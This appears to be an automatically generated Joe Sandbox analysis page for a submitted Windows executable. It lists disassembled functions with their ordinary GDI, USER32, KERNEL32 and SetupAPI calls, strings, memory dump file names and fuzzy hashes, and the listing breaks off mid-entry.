__EH_prolog3.LIBCMT ref: 001CE148
GetSysColor.USER32(00000016), ref: 001CE157
GetSysColor.USER32(0000000F), ref: 001CE164
GetSysColor.USER32(00000015), ref: 001CE177
GetSysColor.USER32(0000000F), ref: 001CE17F
GetDeviceCaps.GDI32(?,0000000C), ref: 001CE1A5
GetSysColor.USER32(0000000F), ref: 001CE1B3
GetSysColor.USER32(00000010), ref: 001CE1BD
GetSysColor.USER32(00000015), ref: 001CE1C7
GetSysColor.USER32(00000016), ref: 001CE1D1
GetSysColor.USER32(00000014), ref: 001CE1DB
GetSysColor.USER32(00000012), ref: 001CE1E5
GetSysColor.USER32(00000011), ref: 001CE1EF
GetSysColor.USER32(00000006), ref: 001CE1F6
GetSysColor.USER32(0000000D), ref: 001CE1FD
GetSysColor.USER32(0000000E), ref: 001CE204
GetSysColor.USER32(00000005), ref: 001CE20B
GetSysColor.USER32(00000008), ref: 001CE215
GetSysColor.USER32(00000009), ref: 001CE21C
GetSysColor.USER32(00000007), ref: 001CE223
GetSysColor.USER32(00000002), ref: 001CE22A
GetSysColor.USER32(00000003), ref: 001CE231
GetSysColor.USER32(0000001B), ref: 001CE238
GetSysColor.USER32(0000001C), ref: 001CE242
GetSysColor.USER32(0000000A), ref: 001CE24C
GetSysColor.USER32(0000000B), ref: 001CE256
GetSysColor.USER32(00000013), ref: 001CE260
GetSysColor.USER32(0000001A), ref: 001CE27A
GetSysColorBrush.USER32(00000010), ref: 001CE295
GetSysColorBrush.USER32(00000014), ref: 001CE2AC
GetSysColorBrush.USER32(00000005), ref: 001CE2BE
CreateSolidBrush.GDI32(?), ref: 001CE2E2
CreateSolidBrush.GDI32(?), ref: 001CE2FE
CreateSolidBrush.GDI32(?), ref: 001CE31A
CreateSolidBrush.GDI32(?), ref: 001CE336
CreateSolidBrush.GDI32(?), ref: 001CE352
CreateSolidBrush.GDI32(?), ref: 001CE36E
CreateSolidBrush.GDI32(?), ref: 001CE38A
CreatePen.GDI32(00000000,00000001), ref: 001CE3B3
CreatePen.GDI32(00000000,00000001), ref: 001CE3D6
CreatePen.GDI32(00000000,00000001), ref: 001CE3F9
CreateSolidBrush.GDI32(?), ref: 001CE47D
CreatePatternBrush.GDI32(00000000), ref: 001CE4BE

Part of subcall function 001D0636: DeleteObject.GDI32(00000000), ref: 001D0645

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: 6395e3069b300026c921572caabc4c8722bcf8a6dfacd51219dd7fe0d74decd4
Instruction ID: ad6e4dc4bb84430b7de367dcaa1a552d385dc54db1d254bc3faa45c685d64247
Opcode Fuzzy Hash: 6395e3069b300026c921572caabc4c8722bcf8a6dfacd51219dd7fe0d74decd4
Instruction Fuzzy Hash: CFB18C70900B449ED735AF75CC96BABBBE4AFA4300F00492EE29B96691DF70E544DF60

Function 00237836 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 421
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00237840
LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 00237A02
GetObjectW.GDI32(00000082,00000018,?), ref: 00237A14
CreateCompatibleDC.GDI32(00000000), ref: 00237A66
GetObjectW.GDI32(00000082,00000018,?), ref: 00237A81
SelectObject.GDI32(?,00000082), ref: 00237A95
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00237AB9
SelectObject.GDI32(?,00000000), ref: 00237ACC
CreateCompatibleDC.GDI32(?), ref: 00237AE2
SelectObject.GDI32(?,?), ref: 00237AF7
SelectObject.GDI32(?,00000000), ref: 00237B06
DeleteObject.GDI32(?), ref: 00237B0B
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00237B2B
GetPixel.GDI32(?,?,?), ref: 00237B4A
SetPixel.GDI32(?,?,?,00000000), ref: 00237B80
SelectObject.GDI32(?,?), ref: 00237BA2
SelectObject.GDI32(?,00000000), ref: 00237BAA
DeleteObject.GDI32(00000082), ref: 00237BAF
DeleteObject.GDI32(00000082), ref: 00237BE1
__EH_prolog3.LIBCMT ref: 00237C15
CreateCompatibleDC.GDI32(00000000), ref: 00237CE0
CreateCompatibleDC.GDI32(00000000), ref: 00237CEC

Strings

, xrefs: 00237A1A
TR/, xrefs: 002379BB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$Delete$H_prolog3Pixel$BitmapImageLoad
String ID: $TR/
API String ID: 1197801157-1616536723
Opcode ID: 15a26b9c4cb43ea1b6ad41f728dfd6cb5565c51d869b4e10d060cee974009517
Instruction ID: 693e858697097215d82c16967f04feee184fd06eed66f90fae158ae5f7973954
Opcode Fuzzy Hash: 15a26b9c4cb43ea1b6ad41f728dfd6cb5565c51d869b4e10d060cee974009517
Instruction Fuzzy Hash: 03026DB0D10229DFCF25DFA4D884AEDBBB5FF08700F10816AE849AA256D7708955DFA0

Function 001CA0E9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,00000000), ref: 001CA126
PathFindExtensionW.SHLWAPI(?,?,?,00000000), ref: 001CA140
__wcsdup.LIBCMT ref: 001CA18A
__wcsdup.LIBCMT ref: 001CA1C8
__wcsdup.LIBCMT ref: 001CA1FC
__wcsdup.LIBCMT ref: 001CA262
__wcsdup.LIBCMT ref: 001CA2A3

Strings

.INI, xrefs: 001CA284
.HLP, xrefs: 001CA241
.CHM, xrefs: 001CA23A
X*1, xrefs: 001CA207

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __wcsdup$ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI$X*1
API String ID: 2477486372-2042891934
Opcode ID: 42e4a2796e3aaabbaa14999dc21c6c38f7ee6520d53bd3c6db43d84cccf28eb6
Instruction ID: 2a47c135355ef3049c5a04b8690c00bc050f337ebb5ecf626e637fb27e6ee182
Opcode Fuzzy Hash: 42e4a2796e3aaabbaa14999dc21c6c38f7ee6520d53bd3c6db43d84cccf28eb6
Instruction Fuzzy Hash: EF51707090075C9ADB22EB74CD45F9A77FCAF24708F4448AEA946D2541EF70E984CF62

Function 001D1323 Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00333518,?,?,00000000,003334FC,003334FC,?,001D1686,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1336
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,003334FC,003334FC,?,001D1686,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C), ref: 001D138C
GlobalHandle.KERNEL32(00D467A8), ref: 001D1395
GlobalUnlock.KERNEL32(00000000), ref: 001D139F
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 001D13B8
GlobalHandle.KERNEL32(00D467A8), ref: 001D13CA
GlobalLock.KERNEL32(00000000), ref: 001D13D1
LeaveCriticalSection.KERNEL32(?,?,?,00000000,003334FC,003334FC,?,001D1686,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D13DA
GlobalLock.KERNEL32(00000000), ref: 001D13E6
_memset.LIBCMT ref: 001D1400
LeaveCriticalSection.KERNEL32(?), ref: 001D142E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 3c16c147b12b4bccfa4f3cd06aab44410167ee218291143783dcac8237d21825
Instruction ID: 25509556acf8c4f3cac0e79844909c6e200f12a670aa5a45a16e435106a55b0a
Opcode Fuzzy Hash: 3c16c147b12b4bccfa4f3cd06aab44410167ee218291143783dcac8237d21825
Instruction Fuzzy Hash: F931AB71640704BFDB209F68EC89A6ABBF9FF44B14B05496EF58AD7660DB30F8408B50

Function 0024BD98 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 0024BD9F

Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F

GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 0024BDF7
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 0024BE09

Strings

s/, xrefs: 0024BDB6
windows, xrefs: 0024BDF1, 0024BDF6, 0024BE03
DragDelay, xrefs: 0024BDFE
DragMinDist, xrefs: 0024BDEC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: s/$DragDelay$DragMinDist$windows
API String ID: 3965097884-3074193238
Opcode ID: 42e89f71b42aeeeed617d87c66f85044f52669e368af0394e0a75b9c03a9e763
Instruction ID: ded96ef443ca5fcaad9439d15c93c4bc25c749b112a1313c5f9d7988211d0610
Opcode Fuzzy Hash: 42e89f71b42aeeeed617d87c66f85044f52669e368af0394e0a75b9c03a9e763
Instruction Fuzzy Hash: 0C01A2B0950744EFD722AF268A8265AFAF8FFA0700F41565FE2459B761C7F0A411CF44

Function 001C1B60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

vector<T> too long, xrefs: 001C1FDB
4)1, xrefs: 001C1BAC
*.*, xrefs: 001C1C15
oem, xrefs: 001C1CBD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: *.*$4)1$oem$vector<T> too long
API String ID: 0-961408045
Opcode ID: 5d9d495967f14dc3313de17ab6d4417bbad865b5bc72b229d95e96ca1f1292f8
Instruction ID: 2db86a49397980ed489ed20a93b67ff99f0f81b2d7c32c70cd12a474124dcc02
Opcode Fuzzy Hash: 5d9d495967f14dc3313de17ab6d4417bbad865b5bc72b229d95e96ca1f1292f8
Instruction Fuzzy Hash: A8919F71A41605ABCB05DBA8C895FEDB7B5FF66320F14825CE421AB2D2DB70EE44CB50

Function 001CF00F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 001CF042
SetLastError.KERNEL32(0000006F,?,?), ref: 001CF059
CreateActCtxWWorker.KERNEL32(?,?,?), ref: 001CF0A1
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 001CF0BF
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 001CF0E1

Strings

, xrefs: 001CF083

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateWorker$ErrorFileLastModuleName
String ID:
API String ID: 3218422885-3916222277
Opcode ID: 3edb17db2e4c179d2505c34fea6cf03f9e8342415d7bd4872a3661f2b6d70319
Instruction ID: 913f4889a3c3e97e49e50970623eee14a8ed6f65bef36bc569cd41942a01ccf9
Opcode Fuzzy Hash: 3edb17db2e4c179d2505c34fea6cf03f9e8342415d7bd4872a3661f2b6d70319
Instruction Fuzzy Hash: 1E216D708003189ECB20DF65D888BEEB7F9BF14724F1046AED069D2190DB709A86DF51

Function 001C1FF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 244
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 001C2089
SetupFindFirstLineW.SETUPAPI(00000000,Manufacturer,00000000,?), ref: 001C2151
SetupCloseInfFile.SETUPAPI(00000000), ref: 001C220A

Strings

Manufacturer, xrefs: 001C214B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Setup$File$CloseFindFirstLineOpen
String ID: Manufacturer
API String ID: 4028048665-624639268
Opcode ID: 8b3ee88d394fedd9e40b9e3bccdfdba9bd2ebc71cf243e29602d38b06c2216e0
Instruction ID: c2817015b834f78cd3ab1a74a5fdbd05869b36f94331832aaf813f9e154f69e8
Opcode Fuzzy Hash: 8b3ee88d394fedd9e40b9e3bccdfdba9bd2ebc71cf243e29602d38b06c2216e0
Instruction Fuzzy Hash: D29136712047418FD314CB2CC886F5AB7E5AFA9324F148B5DF4698B2E1DB31E905CB92

Function 002D86C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xfsopen.LIBCPMT ref: 002D867B
std::_Xfsopen.LIBCPMT ref: 002D8697
_fseek.LIBCMT ref: 002D86AE

Strings

t!1, xrefs: 002D8623

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xfsopenstd::_$_fseek
String ID: t!1
API String ID: 1675860589-1912081479
Opcode ID: 7dc27eee0fa2dfc856dd7b6f15679466ed39d38a18ea99739c399eb292fdfd1e
Instruction ID: 32d46be9f1da2eae69c308e605e8601574826d1261f8bff99bac3bbe8cb948bc
Opcode Fuzzy Hash: 7dc27eee0fa2dfc856dd7b6f15679466ed39d38a18ea99739c399eb292fdfd1e
Instruction Fuzzy Hash: F611E032A312166BEB251D699C02FBB368D9B047B0F194036FF0995391EEB1DC3286C9

Function 001CD20C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 001CD233
_wcslen.LIBCMT ref: 001CD248

Strings

\, xrefs: 001CD24D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: DirectorySystem_wcslen
String ID: \
API String ID: 2940219301-2967466578
Opcode ID: ae5e696d0c4acfd4346a8b4d6a2eef835de43c9a92fbaeab07b9aa7d6e96259e
Instruction ID: 459ef4a0ade6cdd38fdd085bacec160871f2dc4d6a6d9e56ddecd92fbbe04025
Opcode Fuzzy Hash: ae5e696d0c4acfd4346a8b4d6a2eef835de43c9a92fbaeab07b9aa7d6e96259e
Instruction Fuzzy Hash: 0A01757190011CA6CB24DA75ED89FEB77BCAF64350F1408BEB809D3141FB70DA98CA50

Function 00237C0E Relevance: 4.6, APIs: 3, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00237C15
CreateCompatibleDC.GDI32(00000000), ref: 00237CE0
CreateCompatibleDC.GDI32(00000000), ref: 00237CEC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CompatibleCreate$H_prolog3
String ID:
API String ID: 2193723985-0
Opcode ID: e5724c26a3939327b91223102437a4df48d932a0b0f26f03406809fdf4de6224
Instruction ID: f5621818d8b6d05655a852ea686f1ac050fcb85b777af4fc8cdb98c2ab21324e
Opcode Fuzzy Hash: e5724c26a3939327b91223102437a4df48d932a0b0f26f03406809fdf4de6224
Instruction Fuzzy Hash: 1651CCB09217258FCF59DF29D5C16997BA8BF09B00F1081ABEC49DF25ADBB08541CFA0

Function 001C4120 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 001C5200: std::_Lockit::_Lockit.LIBCPMT ref: 001C5211

Part of subcall function 001C67F0: std::_Lockit::_Lockit.LIBCPMT ref: 001C681D
Part of subcall function 001C67F0: std::_Lockit::_Lockit.LIBCPMT ref: 001C6840

std::_Lockit::_Lockit.LIBCPMT ref: 001C41A9

Strings

.\uninstall.log, xrefs: 001C4155

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID: .\uninstall.log
API String ID: 3382485803-3792079071
Opcode ID: a5c9c38cb162cf07cc52818f3b98180b519dc71e9a9ed92cd6bcbd919ffce9f9
Instruction ID: 5e140f7bc7ba48828bb5cc7167e7a3f7eca661a91d7c2e936db1375f47046468
Opcode Fuzzy Hash: a5c9c38cb162cf07cc52818f3b98180b519dc71e9a9ed92cd6bcbd919ffce9f9
Instruction Fuzzy Hash: 5221C1B1B446149BCB10EF289C52F9DB3A8EB64B20F10062EF829E37C0DB35F9048691

Function 001C8C60 Relevance: 3.1, APIs: 2, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 001C8CDA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memmove_s
String ID:
API String ID: 800865076-0
Opcode ID: 1cc18de591e8488ede511b1535777567ef901f2418845d51671b50a2f060aef4
Instruction ID: 1e6f7b22e164948f83a6db646dd4571ce94bbb64cafd53dda3f5dae4694ae440
Opcode Fuzzy Hash: 1cc18de591e8488ede511b1535777567ef901f2418845d51671b50a2f060aef4
Instruction Fuzzy Hash: 54219032601504EFCB00DF68C8C9EAAF3A9EFA4310B10819EE8045B211DF31ED10DBA4

Function 001CF2C1 Relevance: 3.1, APIs: 2, Instructions: 68COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001CF2C8
RtlReleaseActivationContext.NTDLL(?,00000004,001CF3DB), ref: 001CF34C

Memory Dump Source

